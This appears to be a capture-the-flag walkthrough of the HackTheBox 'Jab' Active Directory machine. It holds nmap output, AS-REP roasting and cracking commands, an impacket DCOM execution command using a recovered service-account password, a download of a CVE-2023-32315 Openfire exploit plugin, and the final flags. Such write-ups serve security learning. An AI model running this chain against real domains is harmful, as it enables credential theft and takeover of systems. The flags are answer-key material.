Nmap Results
# Nmap 7.94SVN scan initiated Tue Feb 27 12:31:36 2024 as: nmap -Pn -p- --min-rate 2000 -A -oN nmap.txt 10.10.11.4
Nmap scan report for 10.10.11.4
Host is up (0.012s latency).
Not shown: 65503 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-27 17:32:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
|_ssl-date: 2024-02-27T17:34:46+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-02-27T17:34:45+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
5222/tcp open jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| invalid-namespace
| (timeout)
| auth_mechanisms:
| compression_methods:
| features:
| stream_id: 2w1nsbkqd
| xmpp:
| version: 1.0
|_ capabilities:
|_ssl-date: TLS randomness does not represent time
5223/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| errors:
| (timeout)
| auth_mechanisms:
| unknown:
| compression_methods:
| features:
| xmpp:
|_ capabilities:
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
5262/tcp open jabber
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| invalid-namespace
| (timeout)
| auth_mechanisms:
| compression_methods:
| features:
| stream_id: 1luyjkdr8f
| xmpp:
| version: 1.0
|_ capabilities:
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5263/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| errors:
| (timeout)
| auth_mechanisms:
| unknown:
| compression_methods:
| features:
| xmpp:
|_ capabilities:
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
5269/tcp open xmpp Wildfire XMPP Client
| xmpp-info:
| STARTTLS Failed
| info:
| errors:
| (timeout)
| auth_mechanisms:
| unknown:
| compression_methods:
| features:
| xmpp:
|_ capabilities:
5270/tcp open ssl/xmpp Wildfire XMPP Client
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
5275/tcp open jabber
| fingerprint-strings:
| RPCCheck:
|_ <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info:
| STARTTLS Failed
| info:
| unknown:
| errors:
| invalid-namespace
| (timeout)
| auth_mechanisms:
| compression_methods:
| features:
| stream_id: qj9t3bq52
| xmpp:
| version: 1.0
|_ capabilities:
5276/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
| xmpp-info:
| STARTTLS Failed
| info:
| errors:
| (timeout)
| auth_mechanisms:
| unknown:
| compression_methods:
| features:
| xmpp:
|_ capabilities:
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp open realserver?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Tue, 27 Feb 2024 17:32:00 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 223
| <html>
| <head><title>Openfire HTTP Binding Service</title></head>
| <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Tue, 27 Feb 2024 17:32:05 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7443/tcp open ssl/oracleas-https?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Tue, 27 Feb 2024 17:32:06 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 223
| <html>
| <head><title>Openfire HTTP Binding Service</title></head>
| <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Tue, 27 Feb 2024 17:32:11 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| SSLSessionReq:
| HTTP/1.1 400 Illegal character CNTL=0x16
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 70
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
7777/tcp open socks5 (No authentication; connection not allowed by ruleset)
| socks-auth-info:
|_ No authentication
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-02-27T17:34:34
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 13.23 ms 10.10.14.1
2 13.28 ms 10.10.11.4
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Feb 27 12:34:47 2024 -- 1 IP address (1 host up) scanned in 191.67 seconds
We can see the references to DC01.jab.htb and jab.htb in the nmap output. Let's go ahead and get those added to our /etc/hosts file.
echo '10.10.11.4 DC01.jab.htb jab.htb' | sudo tee -a /etc/hosts
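Rather than eyeballing the scan for hostnames, the same information (the LDAP "Domain:" banner and the certificate commonName / Subject Alternative Name script lines) can be pulled out of the -oN report automatically. The script below is an added example, not part of the original write-up; it runs against a constructed excerpt of the report above and the regexes are my own.

```python
"""Extract hostnames from nmap normal (-oN) output to build /etc/hosts entries.

Added example, not part of the original write-up. It reads the report format
above: the 'Nmap scan report for <ip>' line, the '(Domain: jab.htb0., ...)'
hint on the LDAP service line, and the ssl-cert commonName / SAN script lines.
"""
import re

# Constructed excerpt of the scan report above (not the full output).
SAMPLE_NMAP = """\
Nmap scan report for 10.10.11.4
Host is up (0.012s latency).
PORT STATE SERVICE VERSION
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
5222/tcp open jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
"""

REPORT_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?")
DOMAIN_RE = re.compile(r"\(Domain: ([^,\s]+),")   # LDAP banner, e.g. 'jab.htb0.'
CN_RE = re.compile(r"commonName=([A-Za-z0-9.*-]+)")
SAN_RE = re.compile(r"DNS:([A-Za-z0-9.*-]+)")


def extract_hosts(report: str) -> dict:
    """Map each scanned IP to the sorted hostnames the report reveals for it."""
    hosts, ip = {}, None
    for line in report.splitlines():
        m = REPORT_RE.match(line)
        if m:
            ip = m.group(1)
            hosts.setdefault(ip, set())
            continue
        if ip is None:
            continue
        names = []
        for raw in DOMAIN_RE.findall(line):
            # nmap renders the LDAP domain with a trailing '0.' artefact
            names.append(re.sub(r"0?\.$", "", raw))
        names += CN_RE.findall(line)
        if "Subject Alternative Name" in line:
            names += SAN_RE.findall(line)
        # wildcard names are not resolvable hosts; case-fold the rest
        hosts[ip].update(n.lower() for n in names if "*" not in n)
    return {k: sorted(v) for k, v in hosts.items()}


def hosts_lines(report: str) -> list:
    """Render one /etc/hosts line per IP, ready to append."""
    return [f"{ip} {' '.join(names)}" for ip, names in extract_hosts(report).items()]


if __name__ == "__main__":
    print("\n".join(hosts_lines(SAMPLE_NMAP)))
```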
Service Enumeration
TCP/53
TCP/139,445
TCP/88
Let's see if we can enumerate any valid usernames using Kerberos pre-authentication requests.
impacket-GetNPUsers -usersfile as_rep_list.txt -outputfile as_rep_hashes.txt -no-pass -dc-ip 10.10.11.4 jab.htb/
TCP/5222
I'm not familiar with the steps needed to enumerate the Jabber attack surface, but looking at the nmap output, it seems the Jabber (XMPP) server has bound to multiple ports including tcp/5223, tcp/5262, tcp/5263, tcp/5275, tcp/5276, tcp/7070, tcp/7443.
Let's start by asking Google for some information.
Researching Jabber Enumeration
Connect with a Jabber Client
The article referenced above uses the pidgin XMPP client, so that's what we'll use.
sudo apt install -y pidgin
Exporting the User List
There isn't a clear way of exporting the usernames from this user search function, so we'll have to get creative.
AS-REP Roast with the New List
impacket-GetNPUsers -usersfile jabber_as_rep.txt -outputfile as_rep_hashes.txt -no-pass -dc-ip 10.10.11.4 jab.htb/
john --wordlist=rockyou.txt as_rep_hashes.txt
Adding the Jabber Account
jmontgomery credential and see who has access to what.
TCP/3269
ldapdomaindump -u 'JAB.HTB\jmontgomery' -p 'Midnight_121' -o ldd ldaps://dc01.jab.htb:3269
open ldd/domain_users_by_group.html
# Check help output for usage
impacket-dcomexec -h
impacket-dcomexec -silentcommand -object MMC20 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' 'ping 10.10.14.181'
Exploit
DCOM Exec to Reverse Shell
Post-Exploit Enumeration
Operating Environment
OS & Kernel
WindowsBuildLabEx : 17763.1.x86fre.rs5_release.180914-1434
WindowsCurrentVersion : 6.3
WindowsEditionId : ServerStandard
WindowsInstallationType : Server
WindowsInstallDateFromRegistry : 1/1/1970 12:00:00 AM
WindowsProductId :
WindowsProductName : Windows Server 2019 Standard
WindowsRegisteredOrganization :
WindowsRegisteredOwner : Windows User
WindowsSystemRoot : C:\Windows
WindowsVersion : 1809
TimeZone : (UTC-05:00) Eastern Time (US & Canada)
PowerPlatformRole : Desktop
DeviceGuardSmartStatus : Off
Current User
USER INFORMATION
----------------
User Name SID
================ ============================================
jab\svc_openfire S-1-5-21-715914501-2118353807-243417633-1104
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Distributed COM Users Alias S-1-5-32-562 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
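The svc_openfire account's membership in BUILTIN\Distributed COM Users (S-1-5-32-562) is what the DCOM execution step above relies on, and a service account rarely needs it. As an added example (not from the original write-up), the audit below parses a whoami /all dump and flags such memberships by well-known SID rather than display name, so it also works on localised systems and on the whitespace-collapsed output shown above; the lookup tables are my own.

```python
"""Audit a 'whoami /all' dump for memberships that widen a foothold.

Added example, not from the original write-up. Groups are matched on
well-known SIDs (standard Windows values) so the check is locale-independent.
"""
import re

# Constructed sample, trimmed from the svc_openfire 'whoami /all' output above.
SAMPLE_WHOAMI = (
    "GROUP INFORMATION\n"
    "-----------------\n"
    "Group Name Type SID Attributes\n"
    "Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group\n"
    "BUILTIN\\Distributed COM Users Alias S-1-5-32-562 Mandatory group, Enabled by default, Enabled group\n"
    "BUILTIN\\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group\n"
    "BUILTIN\\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group\n"
    "BUILTIN\\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group\n"
    "NT AUTHORITY\\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group\n"
    "Mandatory Label\\Medium Plus Mandatory Level Label S-1-16-8448\n"
    "\n"
    "PRIVILEGES INFORMATION\n"
    "----------------------\n"
    "Privilege Name Description State\n"
    "SeMachineAccountPrivilege Add workstations to domain Enabled\n"
    "SeChangeNotifyPrivilege Bypass traverse checking Enabled\n"
)

# Well-known SIDs whose membership a service account rarely needs.
RISKY_SIDS = {
    "S-1-5-32-544": "Administrators: full local control",
    "S-1-5-32-562": "Distributed COM Users: may launch and activate DCOM objects remotely",
    "S-1-5-32-554": "Pre-Windows 2000 Compatible Access: legacy read access to AD objects",
    "S-1-5-32-574": "Certificate Service DCOM Access: remote DCOM access to AD CS",
    "S-1-5-32-580": "Remote Management Users: WinRM access",
}
RISKY_PRIVS = {
    "SeMachineAccountPrivilege": "can add computer objects (see ms-DS-MachineAccountQuota)",
}

# Name is non-greedy so multi-word group names stop at the type column.
GROUP_RE = re.compile(r"^(?P<name>.+?)\s+(?P<type>Well-known group|Alias|Group|Label|User)\s+(?P<sid>S-1-[\d-]+)")
PRIV_RE = re.compile(r"^(?P<priv>Se\w+Privilege)\s+.+?\s+(?P<state>Enabled|Disabled)$")


def audit_whoami(text: str) -> list:
    """Return (kind, identifier, reason) findings in the order they appear."""
    findings = []
    for line in text.splitlines():
        g = GROUP_RE.match(line)
        if g and g["sid"] in RISKY_SIDS:
            findings.append(("group", g["sid"], RISKY_SIDS[g["sid"]]))
            continue
        p = PRIV_RE.match(line)
        if p and p["state"] == "Enabled" and p["priv"] in RISKY_PRIVS:
            findings.append(("privilege", p["priv"], RISKY_PRIVS[p["priv"]]))
    return findings


if __name__ == "__main__":
    for kind, ident, reason in audit_whoami(SAMPLE_WHOAMI):
        print(f"{kind:9} {ident:28} {reason}")
```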
Users and Groups
See ldapdomaindump data.
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.4
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2
Open Ports
127.0.0.1:9090 0.0.0.0:0 LISTENING 3192
127.0.0.1:9091 0.0.0.0:0 LISTENING 3192
Interesting Files
C:\Program Files\Openfire\conf\openfire.xml
<adminConsole>
<!-- Disable either port by setting the value to -1 -->
<port>9090</port>
<securePort>9091</securePort>
<interface>127.0.0.1</interface>
</adminConsole>
Privilege Escalation
In the post-exploit enumeration steps, we found a couple of ports listening internally on tcp/9090 and tcp/9091, and we can further see that it's associated with process ID 3076. We can see these TCP ports referenced as the Openfire admin console ports in openfire.xml.
Let's transfer chisel.exe to the target, so we can forward those ports.
I just used the download_chisel function referenced in my notes above to download both chisel and chisel.exe.
wget https://github.com/miko550/CVE-2023-32315/raw/main/openfire-management-tool-plugin.jar -O plugin.jar
Flags
User
cbe0287bba2a7a8b60575f9fbc09ee44
Root
97c1833cc7ea11ba52044b004bb51f1b